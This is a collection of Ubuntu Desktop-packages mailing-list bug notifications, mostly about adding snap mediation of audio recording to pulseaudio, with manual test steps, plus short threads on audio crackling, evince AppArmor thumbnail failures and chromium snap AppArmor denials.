snaps with pulseaudio: $ sudo snap install --dangerous ./test-snapd-pulseaudio_1_amd64.snap $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connecting which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass ... ^Cyes $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes ... yes For strict snaps with audio-playback/audio-record: $ sudo snap refresh core --candidate # make sure have 2.41. 'install' on 16.04 $ sudo snap install --dangerous ./test-snapd-audio-record_1_amd64.snap $ snap connections test-snapd-audio-record # record not connected Interface PlugSlot Notes audio-playback test-snapd-audio-record:audio-playback :audio-playback - audio-recordtest-snapd-audio-record:audio-record-- $ test-snapd-audio-record.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-audio- record/common/ $ test-snapd-audio-record.play /var/snap/test-snapd-audio-record/common/Noise.wav && echo yes
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
** Description changed: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in- snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface- deprecation/13418). The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. [Test Case] Since the pulseaudio mediation behavior triggers when the security label starts with 'snap.' it is su For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes - For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For strict snaps with pulseaudio: $ sudo snap install --dangerous ./test-snapd-pulseaudio_1_amd64.snap $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connecting which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass ... ^Cyes $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes ... yes - For strict snaps with audio-playback/audio-record: + $ sudo snap refresh core --candidate # make sure have 2.41. 'install' on 16.04 $ sudo snap install --dangerous ./test-snapd-audio-record_1_amd64.snap $ snap connections test-snapd-audio-record # record not connected Interface PlugSlot Notes audio-playback test-snapd-audio-record:audio-playback :audio-playback - audio-recordtest-snapd-audio-record:audio-record-- $ test-snapd-audio-record.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-audio- record/common/ $ test-snapd-audio-record.play /var/snap/test-snapd-audio-record/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connecting which is unrelated to
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
Attaching test-snapd-pulseaudio and test-snapd-audio-record snaps. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1781428 Title: please enable snap mediation support Status in pulseaudio package in Ubuntu: Fix Released Status in pulseaudio source package in Xenial: In Progress Status in pulseaudio source package in Bionic: In Progress Bug description: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio- playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio- interface-deprecation/13418). The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. [Test Case] Since the pulseaudio mediation behavior triggers when the security label starts with 'snap.' it is su For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For strict snaps with pulseaudio: $ sudo snap install --dangerous ./test-snapd-pulseaudio_1_amd64.snap $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connecting which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass ... ^Cyes $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes ... yes For strict snaps with audio-playback/audio-record: $ sudo snap install --dangerous ./test-snapd-audio-record_1_amd64.snap $ snap connections test-snapd-audio-record # record not connected Interface PlugSlot Notes audio-playback test-snapd-audio-record:audio-playback :audio-playback - audio-recordtest-snapd-audio-record:audio-record-- $ test-snapd-audio-record.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
** Description changed: + [Impact] + Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. - # Original summary: pulseaudio built with --enable-snappy but 'Enable - Snappy support: no' + To correct this situation but not regress existing behavior, Ubuntu + 19.04's pulseaudio was updated patch to allow playback to all connected + clients (snaps or not), record by classic snaps (see bug 1787324) and + record by strict mode snaps if either the pulseaudio or new-in- + snapd-2.41 audio-record interfaces were connected. With this change, + snapd is in a position to migrate snaps to the new audio-playback and + audio-record interfaces and properly mediate audio recording (see + https://forum.snapcraft.io/t/upcoming-pulseaudio-interface- + deprecation/13418). + + The patch to pulseaudio consists of adding a module, enabling it in + default.pa and then when it is enabled, pulseaudio when faced with a + record operation will, when the connecting process is a snap (ie, its + security label (ie, apparmor label) starts with 'snap.'), query snapd + via its control socket to ask if the snap is classic and if not, whether + the pulseaudio or audio-record interfaces are connected. Adjusting + pulseaudio in the manner does not require coordination with any release + of snapd. It does need a newer version of snapd-glib, which was recently + updated to 1.49 in the last SRU. + + [Test Case] + + Since the pulseaudio mediation behavior triggers when the security label + starts with 'snap.' it is su + + For unconfined applications: + $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" + yes + + $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording + ^Cyes + + $ paplay /tmp/out.wav && echo "yes" + yes + + For confined, non-snap applications: + $ sudo apt-get install evince + + $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav + && echo yes + + $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording + ^Cyes + + $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" + yes + + + For classic snaps: + $ sudo snap install test-snapd-classic-confinement --classic + + $ snap run --shell test-snapd-classic-confinement + + $ cat /proc/self/attr/current # verify we are classic confined + snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) + + $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" + yes + + $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording + ^Cyes + + $ paplay /tmp/out.wav && echo "yes" + yes + + For strict snaps with pulseaudio: + $ sudo snap install --dangerous ./test-snapd-pulseaudio_1_amd64.snap + + $ snap connections test-snapd-pulseaudio + Interface Plug Slot Notes + pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - + + $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created + ... + + $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- + pulseaudio/common/ + + $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes + xcb_connection_has_error() returned true + yes + + (note, the xcb_connection_has_error() message is due to the x11 + interface not being connecting which is unrelated to mediation. x11 is + left out to ensure that just audio-playback/audio-record are tested) + + $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass + ... + ^Cyes + + $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes + ... + yes + + + For strict snaps with audio-playback/audio-record: + $ sudo snap install --dangerous ./test-snapd-audio-record_1_amd64.snap + + $ snap connections test-snapd-audio-record # record not connected + Interface PlugSlot Notes + audio-playback test-snapd-audio-record:audio-playback :audio-playback - + audio-recordtest-snapd-audio-record:audio-record-- + + $ test-snapd-audio-record.play --help # ensure SNAP dirs are created + ... + + $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-audio- + record/common/ + + $ test-snapd-audio-record.play /var/snap/test-snapd-audio-record/common/Noise.wav && echo yes + xcb_connection_has_error() returned true + yes + + (note, the xcb_connection_has_error() message is due to the x11 + interface not being connecting which is
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
** Attachment added: "test-snapd-audio-record_1_amd64.snap" https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/1781428/+attachment/5292539/+files/test-snapd-audio-record_1_amd64.snap -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1781428 Title: please enable snap mediation support Status in pulseaudio package in Ubuntu: Fix Released Status in pulseaudio source package in Xenial: In Progress Status in pulseaudio source package in Bionic: In Progress Bug description: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio- playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio- interface-deprecation/13418). The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. [Test Case] Since the pulseaudio mediation behavior triggers when the security label starts with 'snap.' it is su For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For strict snaps with pulseaudio: $ sudo snap install --dangerous ./test-snapd-pulseaudio_1_amd64.snap $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connecting which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass ... ^Cyes $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes ... yes For strict snaps with audio-playback/audio-record: $ sudo snap install --dangerous ./test-snapd-audio-record_1_amd64.snap $ snap connections test-snapd-audio-record # record not connected Interface PlugSlot Notes audio-playback test-snapd-audio-record:audio-playback :audio-playback - audio-recordtest-snapd-audio-record:audio-record--
[Desktop-packages] [Bug 1781428] Re: pulseaudio built with --enable-snappy but 'Enable Snappy support: no'
** Description changed: + + # Original summary: pulseaudio built with --enable-snappy but 'Enable + Snappy support: no' + + # Original description + From https://launchpadlibrarian.net/377100864/buildlog_ubuntu-cosmic- amd64.pulseaudio_1%3A12.0-1ubuntu1_BUILDING.txt.gz: ... dh_auto_configure -- --enable-x11 --disable-hal-compat --libdir=\${prefix}/lib/x86_64-linux-gnu --with-module-dir=\${prefix}/lib/pulse-12.0/modules --with-zsh-completion-dir=\${datadir}/zsh/vendor-completions --with-bash-completion-dir=\${datadir}/bash-completion/completions --with-systemduserunitdir=\${prefix}/lib/systemd/user --enable-snappy --disable-bluez4 --enable-gsettings --disable-gconf ./configure --build=x86_64-linux-gnu --prefix=/usr --includedir=\${prefix}/include --mandir=\${prefix}/share/man --infodir=\${prefix}/share/info --sysconfdir=/etc --localstatedir=/var --disable-silent-rules --libdir=\${prefix}/lib/x86_64-linux-gnu --libexecdir=\${prefix}/lib/x86_64-linux-gnu --disable-maintainer-mode --disable-dependency-tracking --enable-x11 --disable-hal-compat --libdir=\${prefix}/lib/x86_64-linux-gnu --with-module-dir=\${prefix}/lib/pulse-12.0/modules --with-zsh-completion-dir=\${datadir}/zsh/vendor-completions --with-bash-completion-dir=\${datadir}/bash-completion/completions --with-systemduserunitdir=\${prefix}/lib/systemd/user --enable-snappy --disable-bluez4 --enable-gsettings --disable-gconf ... Enable Ubuntu trust store: no Enable Snappy support: no Enable Apparmor: yes - - At this point, the patch should probably be dropped, otherwise applications like chromium, etc will no longer be able to record. + At this point, the patch should probably be dropped, otherwise + applications like chromium, etc will no longer be able to record. ** Summary changed: - pulseaudio built with --enable-snappy but 'Enable Snappy support: no' + please enable snap mediation support -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1781428 Title: please enable snap mediation support Status in pulseaudio package in Ubuntu: Fix Released Bug description: # Original summary: pulseaudio built with --enable-snappy but 'Enable Snappy support: no' # Original description From https://launchpadlibrarian.net/377100864/buildlog_ubuntu-cosmic- amd64.pulseaudio_1%3A12.0-1ubuntu1_BUILDING.txt.gz: ... dh_auto_configure -- --enable-x11 --disable-hal-compat --libdir=\${prefix}/lib/x86_64-linux-gnu --with-module-dir=\${prefix}/lib/pulse-12.0/modules --with-zsh-completion-dir=\${datadir}/zsh/vendor-completions --with-bash-completion-dir=\${datadir}/bash-completion/completions --with-systemduserunitdir=\${prefix}/lib/systemd/user --enable-snappy --disable-bluez4 --enable-gsettings --disable-gconf ./configure --build=x86_64-linux-gnu --prefix=/usr --includedir=\${prefix}/include --mandir=\${prefix}/share/man --infodir=\${prefix}/share/info --sysconfdir=/etc --localstatedir=/var --disable-silent-rules --libdir=\${prefix}/lib/x86_64-linux-gnu --libexecdir=\${prefix}/lib/x86_64-linux-gnu --disable-maintainer-mode --disable-dependency-tracking --enable-x11 --disable-hal-compat --libdir=\${prefix}/lib/x86_64-linux-gnu --with-module-dir=\${prefix}/lib/pulse-12.0/modules --with-zsh-completion-dir=\${datadir}/zsh/vendor-completions --with-bash-completion-dir=\${datadir}/bash-completion/completions --with-systemduserunitdir=\${prefix}/lib/systemd/user --enable-snappy --disable-bluez4 --enable-gsettings --disable-gconf ... Enable Ubuntu trust store: no Enable Snappy support: no Enable Apparmor: yes At this point, the patch should probably be dropped, otherwise applications like chromium, etc will no longer be able to record. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/1781428/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 301755] Re: Crackling noise after update to pulseaudio
Sorry for bringing up an old post but I had problems similar to what was described here. I was able to "fix" the crackling audio issues using the following lines in daemon.pa: high-priority = yes nice-level = -11 realtime-scheduling = yes default-fragments = 8 default-fragment-size-msec = 10 Note that this instance of PulseAudio was not running on a ubuntu machine but on a OpenWRT based router (BT HomeHub 5) which is used as a sink for a ubuntu based machine - however since this post came high in the list of search results when I searched the crackling audio issue, there is a possibility that my addition may help somebody. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/301755 Title: Crackling noise after update to pulseaudio Status in pulseaudio package in Ubuntu: Fix Released Bug description: Binary package hint: pulseaudio After upgrading to Jaunty, when listening to audio through Pulseaudio, I get a crackling sound, that seems to be bound to system load. Not necessarily CPU load, the CPU load is well below 50% at all times, but I.E. harddisk access seems to provoke the crackling extra. When disabling Pulseaudio, running directly towards ALSA, the crackling disappear. My soundcard according to lspci: nVidia Corporation CK804 AC'97 Audio Controller (rev a2). (Motherboard built-in) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/301755/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1834386] Re: Ebooks thumbnails fail in Nemo over SMB
(nemo:31811): CinnamonDesktop-WARNING **: 01:08:30.200: Error creating thumbnail for smb://akem- hp.local/comics_bds_mangas/Scrooge/Uncle%20Scrooge%20(001-100)%20GetComics.INFO/029%20Uncle%20Scrooge.cbr: Unrecognized image file format This suggests that the problem is not due to the apparmor profile (it happens before the denial). Is the thumbnail correctly generated if you do: sudo apparmor_parser -R /etc/apparmor.d/usr.bin.evince (this unloads the policy from the kernel). ** Changed in: evince (Ubuntu) Status: New => Incomplete ** Tags added: apparmor -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1834386 Title: Ebooks thumbnails fail in Nemo over SMB Status in evince package in Ubuntu: Incomplete Bug description: Nemo is unable to generate ebooks thumbnails over SMB share because of evince-thumbnailer apparmor profile(note that Nautilus is able to do it anyway), i removed apparmor to see and it fixed that issue. Nemo output when generating thumbs: - (nemo:31811): CinnamonDesktop-WARNING **: 01:08:30.200: Error creating thumbnail for smb://akem-hp.local/comics_bds_mangas/Scrooge/Uncle%20Scrooge%20(001-100)%20GetComics.INFO/029%20Uncle%20Scrooge.cbr: Unrecognized image file format Error loading remote document: An AppArmor policy prevents this sender from sending this message to this recipient; type="method_call", sender=":1.243" (uid=1000 pid=1488 comm="evince-thumbnailer -s 128 smb://akem-hp.local/comi" label="/usr/bin/evince-thumbnailer (enforce)") interface="org.gtk.vfs.MountTracker" member="LookupMount" error name="(unset)" requested_reply="0" destination=":1.10" (uid=1000 pid=1725 comm="/usr/lib/gvfs/gvfsd " label="unconfined") (nemo:31811): CinnamonDesktop-WARNING **: 01:08:30.365: Unable to create loader for mime type application/x-cbr: Unrecognized image file format - Note that it does the same with pdf or some other ebooks format. The problem happens in loopback too, just share a folder with ebooks using SMB, flush the thumbnails and open Nemo to that folder via Network(connect to the SMB). ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: evince 3.28.4-0ubuntu1.2 ProcVersionSignature: Ubuntu 4.18.0-22.23~18.04.1-generic 4.18.20 Uname: Linux 4.18.0-22-generic x86_64 NonfreeKernelModules: nvidia_modeset nvidia ApportVersion: 2.20.9-0ubuntu7.5 Architecture: amd64 Date: Thu Jun 27 02:11:28 2019 InstallationDate: Installed on 2019-05-31 (26 days ago) InstallationMedia: Ubuntu 18.04.2 LTS "Bionic Beaver" - Release amd64 (20190210) SourcePackage: evince UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evince/+bug/1834386/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1828275] Re: [snap] chromium generates a lot of Apparmor noise
You can 'sudo snap connect chromium:mount-observe' for /etc/fstab. /run/mount/utab is more complicated and you can read about it here: https://forum.snapcraft.io/t/namespace-awareness-of-run-mount-utab-and- libmount/5987 For the /run/udev/data accesses, can you paste the output of: $ cat /run/udev/data/b230\:* ** Package changed: chromium-browser (Ubuntu) => snapd (Ubuntu) ** Changed in: snapd (Ubuntu) Status: New => Incomplete -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1828275 Title: [snap] chromium generates a lot of Apparmor noise Status in snapd package in Ubuntu: Incomplete Bug description: Running Chromium's snap result in a lot of Apparmor noise like this: audit: type=1400 audit(0): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/run/mount/utab" pid=0 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 audit: type=1400 audit(0): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/run/udev/data/b230:0" pid=0 comm="ThreadPoolForeg" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 The above and the attached log was collected with: journalctl -o cat -k | grep -F ' apparmor="DENIED" ' | grep -F snap.chromium.chromium | sed 's/ audit([0-9.:]\+): / audit(0): /; s/ pid=[0-9]\+ / pid=0 /' | sort Additional information: $ snap info chromium name: chromium summary: Chromium web browser, open-source version of Chrome publisher: Canonical✓ contact: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bugs?field.tag=snap license: unset description: | An open-source browser project that aims to build a safer, faster, and more stable way for all Internet users to experience the web. commands: - chromium.chromedriver - chromium snap-id: XKEcBqPM06H1Z7zGOdG5fbICuf8NWK5R tracking: edge refresh-date: 11 days ago, at 12:08 EDT channels: stable:74.0.3729.131 2019-05-02 (705) 162MB - candidate: 74.0.3729.131 2019-05-01 (705) 162MB - beta: 74.0.3729.61 2019-04-06 (688) 162MB - edge: 75.0.3770.9 2019-04-27 (703) 163MB - installed: 75.0.3770.9 (703) 163MB - $ snap interfaces chromium SlotPlug :browser-supportchromium:browser-sandbox :camera chromium :desktopchromium :gsettings chromium :home chromium :networkchromium :network-bind chromium :opengl chromium :personal-files chromium:chromium-config :pulseaudio chromium :screen-inhibit-control chromium :u2f-deviceschromium :unity7 chromium :upower-observe chromium :x11chromium gtk-common-themes:gtk-3-themes chromium gtk-common-themes:icon-themes chromium gtk-common-themes:sound-themes chromium - chromium:cups-control - chromium:mount-observe - chromium:network-manager - chromium:password-manager-service - chromium:removable-media $ apt-cache policy snapd snapd: Installed: 2.38+18.04 Candidate: 2.38+18.04 Version table: *** 2.38+18.04 500 500 http://archive.ubuntu.com/ubuntu bionic-updates/main amd64 Packages 100 /var/lib/dpkg/status 2.37.4+18.04.1 500 500 http://security.ubuntu.com/ubuntu bionic-security/main amd64 Packages 2.32.5+18.04 500 500 http://archive.ubuntu.com/ubuntu bionic/main amd64 Packages $ lsb_release -rd Description: Ubuntu 18.04.2 LTS Release: 18.04 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/snapd/+bug/1828275/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1826415] Re: Videos do not play in presentation mode
** Tags removed: apparmor -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1826415 Title: Videos do not play in presentation mode Status in Evince: New Status in evince package in Ubuntu: Triaged Bug description: It is not possible to play embedded videos in the presentation mode. This affects PDF slides created with the beamer/multimedia latex package. Initially, no controls are shown on the slide with the video. In the normal mode, video controls appear when the video is clicked with the mouse. However, in the presentation mode, evince goes to the next page when one clicks with the mouse so that the controls do not appear and the video can only be played by exiting the presentation mode. Playing videos works fine in presentation mode with the okular PDF-viewer. ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: evince 3.28.4-0ubuntu1 Uname: Linux 4.15.0-041500rc6-generic x86_64 ApportVersion: 2.20.9-0ubuntu7.6 Architecture: amd64 CurrentDesktop: GNOME Date: Thu Apr 25 16:15:43 2019 InstallationDate: Installed on 2015-11-05 (1267 days ago) InstallationMedia: Ubuntu 14.04.3 LTS "Trusty Tahr" - Beta amd64 (20150805) SourcePackage: evince UpgradeStatus: Upgraded to bionic on 2018-05-24 (335 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/evince/+bug/1826415/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
